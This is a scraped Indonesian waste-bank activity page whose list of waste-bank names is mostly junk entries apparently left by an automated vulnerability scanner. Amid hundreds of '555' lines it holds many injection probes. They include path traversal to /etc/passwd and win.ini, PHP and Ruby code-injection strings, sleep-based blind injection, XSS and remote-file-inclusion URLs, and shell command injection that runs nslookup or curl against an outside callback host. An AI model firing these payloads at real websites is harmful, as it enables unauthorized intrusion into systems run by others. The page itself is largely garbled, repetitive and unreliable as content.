Home
Kegiatan
SibaKU
Login
Contact Us
Kegiatan Bank Sampah
Berikut adalah kegiatan yang dilakukan bank sampah dalam mengelola sampah
Pilih Bank Sampah
Uwuh Mulyo
BS SMPN 2 Kokap
Lumpuk Uwuh
Pripih Mulyo
Giri Uwuh
Kober
SMP N 1 Pengasih
Kalkid Asri
Beringin
Melati
Skansa
Dhuawar Sejahtera
Klegen Berseri
Mawar Asri 1
Mawar Asri 2
Harapan Sejahtera
Handayani
Resik Migunani (Resmi)
Gemilang
Mekar Asri
Ngudi Rejeki II
Ngudi Rejeki I
Ngudi Lestari
Serang Bersinar
Mahanani
Mugi Makmur
Mitayani
Flamboyan
Sadidu 29
Putri Sehati
Seruni
Migunani
Berkah
Mawar Mekar
Blimbing Barokah
Harapan Makmur
Barokah Sentolo
Pusaka Srikandi
Bunda Mandiri
Limbah Mulyo (Limbah Mulia)
Seruni Sentolo
Pelopor Kebersihan
Pulung Rejeki
Sapu Jagad
Trimo Lothong
Wadas Mandiri
Sastra
Sehat
Barokah Girimulyo
Bina Makmur
Maju Jaya
Anugerah
Ambar Puspita
Suka Maju
Sekar Mandiri
Harapan Asri
Tambah Makmur
Sumber Rejeki
Mekar Asri Panjatan
Guyub Rukun
Barokah Panjatan
Flamboyan 4
Berkah Makmur
Flamboyan 3
Cemerlang
Handayani Panjatan
Sekar Mandiri
Pulung Sari
Kisik Asri
Uwuh Harjo
Blumbang Berseri
Banjar Lestari
Ngudi Resik
Katon Kencono
Mitra Kinasih
Abyudaya
Aisyah / Cemerlang
Arto Kencono
Permika Muda
Kiskendo
Makmur Sejati
Himagen
Kusuma Tanaya
Cahaya Surga
Mulya Jaya
Dadi Resik
Maju Sehati
JOS (Jogoyudan Olah Sampah)
Berkah Mandiri
Bank Sampah EMAS #21
Bank Sampah NOJI
Bank Sampah Mitra Sejahtera
Bank Sampah Pusaka
Bank Sampah Manfaati
Bank Sampah Mandiri Sejahtera
Bank Sampah Sampurna Asih
Bank Sampah Dimas Diajeng
Bank Sampah Kalimanggis
Bank Sampah Pasopati
Bank Sampah Sedulur Sinoro Wedi
Bank Sampah Sumber Resik
Bank Sampah Sampah jadi rupiah watu tekek
Tanjung Berkah
Asa Sejahtera
Ngudi resik Temon
Kapas
Berkah Samigaluh
Sadewa
Merti Bumi Lestari
KLL (Kantor Layanan Lazismu
Giat Manunggal
Mbak Darsih
Sinergi Berdaya
Berkah Sumringah
Maju makmur
Gemah ripah
Barokah Lendah
Gumilar
Dadi Asri
Bina Sejahtera
QtA
Kresek Mas
Tanggul Barokah
Karya Sampah
Bank Sampah PKK Kalurahan Karangwuni
Alam Lestari
Bank Sampah Indah Lestari
Bank sampah Boro
Bank Sampah Harapan Baru
Bank Sampah Sempu Madani Asri
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
xBnCkut9
555
555
555
555
555
555
555
555
555
F1UgJPWF: hRXNbHbU
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
response.write(9878385*9372464)
555
555
555
555
555
'+response.write(9878385*9372464)+'
555
555
555
555
"+response.write(9878385*9372464)+"
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
${9999479+9999789}
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
12345'"\'\");|]*{ <>?''????
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555&n914637=v957844
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
redirtest.acx
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
)
555
555
555
555
555
555
!(()&&!|*|*|
555
555
555
555
555
555
555
555
555
^(#$!@#$)(()))******
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
../../../../../../../../../../../../../../etc/passwd
555
555
555
555
555
555
555
../../../../../../../../../../../../../../windows/win.ini
555
555
555
555
555
555
555
file:///etc/passwd
555
555
555
555
555
555
555
555
555
555
555
555
555
555
../555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
'.gethostbyname(lc('hitpt'.'kbzrkriu27221.bxss.me.')).'A'.chr(67).chr(hex('58')).chr(98).chr(67).chr
555
555
555
555
555
".gethostbyname(lc("hithv"."hfiyvghf2b715.bxss.me."))."A".chr(67).chr(hex("58")).chr(97).chr(88).chr
555
555
555
555
555
gethostbyname(lc('hitpk'.'dfemeibj24f71.bxss.me.')).'A'.chr(67).chr(hex('58')).chr(120).chr(75).chr(
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
HttP://bxss.me/t/xss.html?
555
555
555
555
555
555
bxss.me/t/xss.html?
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
)))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))
555
xfs.bxss.me
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
"+"A".concat(70-3).concat(22*4).concat(101).concat(76).concat(110).concat(87)+(require"socket" Socke
555
555
555
555
555
555
555
'+'A'.concat(70-3).concat(22*4).concat(122).concat(86).concat(118).concat(67)+(require'socket' Socke
555
555
555
555
'A'.concat(70-3).concat(22*4).concat(104).concat(78).concat(118).concat(86)+(require'socket' Socket.
555
555
555
555
555
555
555
555
555
555
http://dicrpdbjmemujemfyopp.zzz/yrphmgdpgulaszriylqiipemefmacafkxycjaxjs?.jpg
555
555
555
555
555
1yrphmgdpgulaszriylqiipemefmacafkxycjaxjs.jpg
555
555
555
555
555
555
555
555
555
/etc/shells
555
555
555
555
555
555
../../../../../../../../../../../../../../etc/shells
555
555
555
555
c:/windows/win.ini
555
555
555
555
555
555
555
555
bxss.me
555
555
555
Http://bxss.me/t/fit.txt
555
555
555
555
555
http://bxss.me/t/fit.txt?.jpg
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
'"
555
555
555
555
555
555
555
<!--
555
555
555
555
555
555
555
555
555
555
555
555
'"()
555
555
555
555
555
555
555
555'&&sleep(27*1000)*pbjnee&&'
555
555
555
555
555
555
555"&&sleep(27*1000)*bhwubj&&"
555
555
555
555
555
555
555'||sleep(27*1000)*repckc||'
555
555
555
555
;assert(base64_decode('cHJpbnQobWQ1KDMxMzM3KSk7'));
555
555"||sleep(27*1000)*aoqilv||"
555
555
555
';print(md5(31337));$a='
555
555
555
555
555
";print(md5(31337));$a="
555
555
555
555
555
${@print(md5(31337))}
555
555
555
555
555
${@print(md5(31337))}\
555
555
555
555
555
'.print(md5(31337)).'
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555'"()&%
[removed]GOHd(9365)[removed]
555
555
555
555
555
555
'"()&%
[removed]GOHd(9095)[removed]
555
555
555
555
555
555
5559651649
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
echo ibjqav$()\ ctlrbf\nz^xyu||a #' &echo ibjqav$()\ ctlrbf\nz^xyu||a #|" &echo ibjqav$()\ ctlrbf\nz
555
555
555
555
555
555
&echo lnnnex$()\ umbivb\nz^xyu||a #' &echo lnnnex$()\ umbivb\nz^xyu||a #|" &echo lnnnex$()\ umbivb\n
555
555
555
555
555
555
555
555
555
555&echo rvynuo$()\ cdjqay\nz^xyu||a #' &echo rvynuo$()\ cdjqay\nz^xyu||a #|" &echo rvynuo$()\ cdjqa
555
555
555
555
555
555
555
555
555
555
|echo qwalwm$()\ kykism\nz^xyu||a #' |echo qwalwm$()\ kykism\nz^xyu||a #|" |echo qwalwm$()\ kykism\n
555
555
555
555
555
555
555
555
555
555|echo nrlvmp$()\ ivuebs\nz^xyu||a #' |echo nrlvmp$()\ ivuebs\nz^xyu||a #|" |echo nrlvmp$()\ ivueb
555
555
555
555
555
555
555
555
555
expr 9000313877 - 962796
555
555
555
555
555
555
555
response.write(9207622*9428356)
555
(nslookup -q=cname hiterqkffghwnb210e.bxss.me||curl hiterqkffghwnb210e.bxss.me))
555
555
555
555
555
555
'+response.write(9207622*9428356)+'
555
555
555
555
$(nslookup -q=cname hitrznkoqmhfp8767f.bxss.me||curl hitrznkoqmhfp8767f.bxss.me)
555
555
555
"+response.write(9207622*9428356)+"
555
eIZJqvCu
${9999599+9999064}
&nslookup -q=cname hitljuhitowkta28d8.bxss.me&'\"`0&nslookup -q=cname hitljuhitowkta28d8.bxss.me&`'
555
555
555
555
555
555
555
555
555
2Hc5mei7: gRdftTzJ
555
555
&(nslookup -q=cname hitpsbpgqyktz9cf53.bxss.me||curl hitpsbpgqyktz9cf53.bxss.me)&'\"`0&(nslookup -q=
555
555
555
555
555
555
555
555
|(nslookup -q=cname hitlipwhosixxf60e2.bxss.me||curl hitlipwhosixxf60e2.bxss.me)
555
555
555
555
555
555
555
`(nslookup -q=cname hitsrhddzvmdu75406.bxss.me||curl hitsrhddzvmdu75406.bxss.me)`
555
555
555
555
555
555
555
555
555
555
;(nslookup -q=cname hitktivvfptde02dca.bxss.me||curl hitktivvfptde02dca.bxss.me)|(nslookup -q=cname
555
555
555
555
555
|(nslookup${IFS}-q${IFS}cname${IFS}hittatqcdamzl13192.bxss.me||curl${IFS}hittatqcdamzl13192.bxss.me)
555
555
555
555
555
&(nslookup${IFS}-q${IFS}cname${IFS}hitfptczotfazac56f.bxss.me||curl${IFS}hitfptczotfazac56f.bxss.me)
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555&n954217=v987945
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
redirtest.acx
555
555
555
555
555
555
555
555
555
12345'"\'\");|]*{ <>?''????
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
)
555
555
555
555
555
555
555
555
!(()&&!|*|*|
555
555
555
555
555
555
^(#$!@#$)(()))******
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
)))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
xfs.bxss.me
555
555
555
555
555
555
555
555
555
555
555
555
555
555
'.gethostbyname(lc('hitrg'.'lyxxzmsz0615f.bxss.me.')).'A'.chr(67).chr(hex('58')).chr(109).chr(76).ch
555
555
555
555
555
555
555
HttP://bxss.me/t/xss.html?
555
555
".gethostbyname(lc("hitcy"."eefhykvee47fd.bxss.me."))."A".chr(67).chr(hex("58")).chr(115).chr(77).ch
555
555
555
555
../../../../../../../../../../../../../../etc/passwd
555
555
555
555
555
555
bxss.me/t/xss.html?
gethostbyname(lc('hituw'.'kdqbclgh5ffaa.bxss.me.')).'A'.chr(67).chr(hex('58')).chr(107).chr(82).chr(
../../../../../../../../../../../../../../windows/win.ini
555
555
555
555
555
555
555
555
555
file:///etc/passwd
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
../555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
"+"A".concat(70-3).concat(22*4).concat(114).concat(65).concat(116).concat(65)+(require"socket" Socke
555
555
555
555
555
555
555
'+'A'.concat(70-3).concat(22*4).concat(118).concat(84).concat(119).concat(75)+(require'socket' Socke
555
555
'"
555
555
'A'.concat(70-3).concat(22*4).concat(106).concat(66).concat(112).concat(75)+(require'socket' Socket.
555
555
555
555
<!--
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
http://dicrpdbjmemujemfyopp.zzz/yrphmgdpgulaszriylqiipemefmacafkxycjaxjs?.jpg
555
555
555
555
555
555
555
1yrphmgdpgulaszriylqiipemefmacafkxycjaxjs.jpg
555
555
555
555
555
555
555
/etc/shells
555
555
555
555
555
../../../../../../../../../../../../../../etc/shells
555
555
555
c:/windows/win.ini
555
555
555
555
bxss.me
555
555
555
Http://bxss.me/t/fit.txt
555
555
555
555
http://bxss.me/t/fit.txt?.jpg
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555'"()&%
[removed]EqI4(9742)[removed]
555
555
555
555
'"()&%
[removed]EqI4(9341)[removed]
555
555
555
5559821546
555
555
'"()
555
555
;assert(base64_decode('cHJpbnQobWQ1KDMxMzM3KSk7'));
555
555'&&sleep(27*1000)*kdjldt&&'
555
555
';print(md5(31337));$a='
555
555"&&sleep(27*1000)*tqryny&&"
555
555
555
";print(md5(31337));$a="
555
555'||sleep(27*1000)*gdelie||'
555
555
${@print(md5(31337))}
555
555"||sleep(27*1000)*pomkna||"
555
555
${@print(md5(31337))}\
555
555
555
'.print(md5(31337)).'
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
echo vqmbua$()\ gbaluu\nz^xyu||a #' &echo vqmbua$()\ gbaluu\nz^xyu||a #|" &echo vqmbua$()\ gbaluu\nz
&echo snxapy$()\ ovxwjg\nz^xyu||a #' &echo snxapy$()\ ovxwjg\nz^xyu||a #|" &echo snxapy$()\ ovxwjg\n
555&echo vklbji$()\ conugn\nz^xyu||a #' &echo vklbji$()\ conugn\nz^xyu||a #|" &echo vklbji$()\ conug
|echo fcxegn$()\ dciwek\nz^xyu||a #' |echo fcxegn$()\ dciwek\nz^xyu||a #|" |echo fcxegn$()\ dciwek\n
555|echo zmdedt$()\ rphvvr\nz^xyu||a #' |echo zmdedt$()\ rphvvr\nz^xyu||a #|" |echo zmdedt$()\ rphvv
expr 9000397002 - 916227
555
(nslookup -q=cname hitsojchnyiij81603.bxss.me||curl hitsojchnyiij81603.bxss.me))
$(nslookup -q=cname hitkzycotiwtq4c2e3.bxss.me||curl hitkzycotiwtq4c2e3.bxss.me)
&nslookup -q=cname hituioowmheppd49a9.bxss.me&'\"`0&nslookup -q=cname hituioowmheppd49a9.bxss.me&`'
&(nslookup -q=cname hitfrziedlfqj52bc5.bxss.me||curl hitfrziedlfqj52bc5.bxss.me)&'\"`0&(nslookup -q=
|(nslookup -q=cname hitfogtxeuedu54eb7.bxss.me||curl hitfogtxeuedu54eb7.bxss.me)
`(nslookup -q=cname hitktsaldbyri7f13b.bxss.me||curl hitktsaldbyri7f13b.bxss.me)`
;(nslookup -q=cname hitesdqowcuria3b1d.bxss.me||curl hitesdqowcuria3b1d.bxss.me)|(nslookup -q=cname
|(nslookup${IFS}-q${IFS}cname${IFS}hitkyzhkguyga0bc2f.bxss.me||curl${IFS}hitkyzhkguyga0bc2f.bxss.me)
555
&(nslookup${IFS}-q${IFS}cname${IFS}hitgblojfkzlf75477.bxss.me||curl${IFS}hitgblojfkzlf75477.bxss.me)
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
${9999490+9999440}
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
MgN58Xkj
555
555
555
555
qvjCRp9E: xsQlsymj
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555&n938310=v940760
555
555
555
555
555
555
response.write(9624234*9970869)
555
555
555
555
555
555
555
'+response.write(9624234*9970869)+'
555
555
555
555
555
555
555
555
"+response.write(9624234*9970869)+"
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
redirtest.acx
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
12345'"\'\");|]*{ <>?''????
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
)
555
555
555
555
555
555
555
555
555
!(()&&!|*|*|
555
555
555
555
555
555
555
555
555
^(#$!@#$)(()))******
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
HttP://bxss.me/t/xss.html?
555
555
555
555
555
555
555
555
555
555
bxss.me/t/xss.html?
555
555
555
555
555
'.gethostbyname(lc('hitik'.'lkgjaeole1ace.bxss.me.')).'A'.chr(67).chr(hex('58')).chr(121).chr(72).ch
555
555
555
555
555
555
555
555
555
".gethostbyname(lc("hitqi"."rkavhvfl97d27.bxss.me."))."A".chr(67).chr(hex("58")).chr(109).chr(80).ch
555
555
555
555
555
555
555
555
555
gethostbyname(lc('hitqz'.'gofhfefoa3ee9.bxss.me.')).'A'.chr(67).chr(hex('58')).chr(97).chr(76).chr(1
555
555
555
555
555
555
555
555
)))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
xfs.bxss.me
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
"+"A".concat(70-3).concat(22*4).concat(99).concat(70).concat(113).concat(65)+(require"socket" Socket
555
555
555
555
555
555
555
'+'A'.concat(70-3).concat(22*4).concat(104).concat(76).concat(98).concat(66)+(require'socket' Socket
555
555
555
555
555
555
'A'.concat(70-3).concat(22*4).concat(121).concat(85).concat(99).concat(67)+(require'socket' Socket.g
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
'"
555
555
555
555
555
555
555
<!--
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
../../../../../../../../../../../../../../etc/passwd
555
555
555
555
555
555
../../../../../../../../../../../../../../windows/win.ini
555
555
555
555
555
555
file:///etc/passwd
555
555
555
555
555
555
555
http://dicrpdbjmemujemfyopp.zzz/yrphmgdpgulaszriylqiipemefmacafkxycjaxjs?.jpg
555
../555
555
555
1yrphmgdpgulaszriylqiipemefmacafkxycjaxjs.jpg
555
555
555
555
/etc/shells
555
555
555
555
../../../../../../../../../../../../../../etc/shells
555
555
555
;assert(base64_decode('cHJpbnQobWQ1KDMxMzM3KSk7'));
555
c:/windows/win.ini
555
555
555
';print(md5(31337));$a='
555
555
bxss.me
555
555
";print(md5(31337));$a="
555
Http://bxss.me/t/fit.txt
555
555
555
${@print(md5(31337))}
555
555
http://bxss.me/t/fit.txt?.jpg
555
555
${@print(md5(31337))}\
555
555
555
555
555
555
'.print(md5(31337)).'
555
555
555'"()&%
[removed]XXZB(9746)[removed]
555
555
555
555
555
555
555
'"()&%
[removed]XXZB(9754)[removed]
555
555
555
555
555
5559471545
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
'"()
555
555
555
555'&&sleep(27*1000)*cxyksu&&'
555
555
555
555"&&sleep(27*1000)*kklzte&&"
555
555
555'||sleep(27*1000)*inkjoq||'
555
555
555"||sleep(27*1000)*qmgued||"
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
echo pqkpzc$()\ drzasm\nz^xyu||a #' &echo pqkpzc$()\ drzasm\nz^xyu||a #|" &echo pqkpzc$()\ drzasm\nz
555
&echo vtejdx$()\ oxrzxt\nz^xyu||a #' &echo vtejdx$()\ oxrzxt\nz^xyu||a #|" &echo vtejdx$()\ oxrzxt\n
555&echo sfppmu$()\ qmmhsr\nz^xyu||a #' &echo sfppmu$()\ qmmhsr\nz^xyu||a #|" &echo sfppmu$()\ qmmhs
|echo hxkavd$()\ hrirdg\nz^xyu||a #' |echo hxkavd$()\ hrirdg\nz^xyu||a #|" |echo hxkavd$()\ hrirdg\n
555
555|echo cvvgsr$()\ thttum\nz^xyu||a #' |echo cvvgsr$()\ thttum\nz^xyu||a #|" |echo cvvgsr$()\ thttu
expr 9000828018 - 910948
(nslookup -q=cname hitgzcyjfdkua8d04e.bxss.me||curl hitgzcyjfdkua8d04e.bxss.me))
$(nslookup -q=cname hitrbhnweuzbpa1c61.bxss.me||curl hitrbhnweuzbpa1c61.bxss.me)
&nslookup -q=cname hithknsnvqphd4bf0e.bxss.me&'\"`0&nslookup -q=cname hithknsnvqphd4bf0e.bxss.me&`'
&(nslookup -q=cname hitpxdypxqvee55fb1.bxss.me||curl hitpxdypxqvee55fb1.bxss.me)&'\"`0&(nslookup -q=
|(nslookup -q=cname hitjdicsumjzk5172b.bxss.me||curl hitjdicsumjzk5172b.bxss.me)
`(nslookup -q=cname hituikneicsnpff429.bxss.me||curl hituikneicsnpff429.bxss.me)`
;(nslookup -q=cname hitlvfsanvsbqa709d.bxss.me||curl hitlvfsanvsbqa709d.bxss.me)|(nslookup -q=cname
555
|(nslookup${IFS}-q${IFS}cname${IFS}hitfcuxhtogkpd4ba5.bxss.me||curl${IFS}hitfcuxhtogkpd4ba5.bxss.me)
&(nslookup${IFS}-q${IFS}cname${IFS}hitxcxazbjmrod6835.bxss.me||curl${IFS}hitxcxazbjmrod6835.bxss.me)
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
zhTL5ZlE
555
555
555
EMtF28LE: JhrM0iAV
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
response.write(9202307*9573990)
555
555
555
555
'+response.write(9202307*9573990)+'
555
555
555
555
"+response.write(9202307*9573990)+"
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
12345'"\'\");|]*{ <>?''????
555
555
555
555
555
555
555
555
555
${10000270+9999358}
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555&n911556=v921081
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
../../../../../../../../../../../../../../etc/passwd
555
555
555
555
../../../../../../../../../../../../../../windows/win.ini
555
555
555
555
file:///etc/passwd
555
555
555
555
555
555
555
555
../555
555
555
555
555
555
555
555
555
)
555
555
!(()&&!|*|*|
555
555
555
555
^(#$!@#$)(()))******
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
redirtest.acx
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
HttP://bxss.me/t/xss.html?
555
555
555
http://dicrpdbjmemujemfyopp.zzz/yrphmgdpgulaszriylqiipemefmacafkxycjaxjs?.jpg
555
bxss.me/t/xss.html?
555
555
555
555
1yrphmgdpgulaszriylqiipemefmacafkxycjaxjs.jpg
555
555
555
555
555
555
555
/etc/shells
555
555
555
555
555
555
555
../../../../../../../../../../../../../../etc/shells
555
555
555
555
555
555
555
555
555
c:/windows/win.ini
555
555
555
'.gethostbyname(lc('hitxs'.'cbgdslxsbebd6.bxss.me.')).'A'.chr(67).chr(hex('58')).chr(108).chr(86).ch
555
)))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))
555
bxss.me
555
555
555
555
".gethostbyname(lc("hittm"."eveesszfd254e.bxss.me."))."A".chr(67).chr(hex("58")).chr(115).chr(85).ch
555
555
Http://bxss.me/t/fit.txt
555
555
555
gethostbyname(lc('hitxh'.'toyaxuwh69998.bxss.me.')).'A'.chr(67).chr(hex('58')).chr(106).chr(83).chr(
555
555
555
555
http://bxss.me/t/fit.txt?.jpg
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
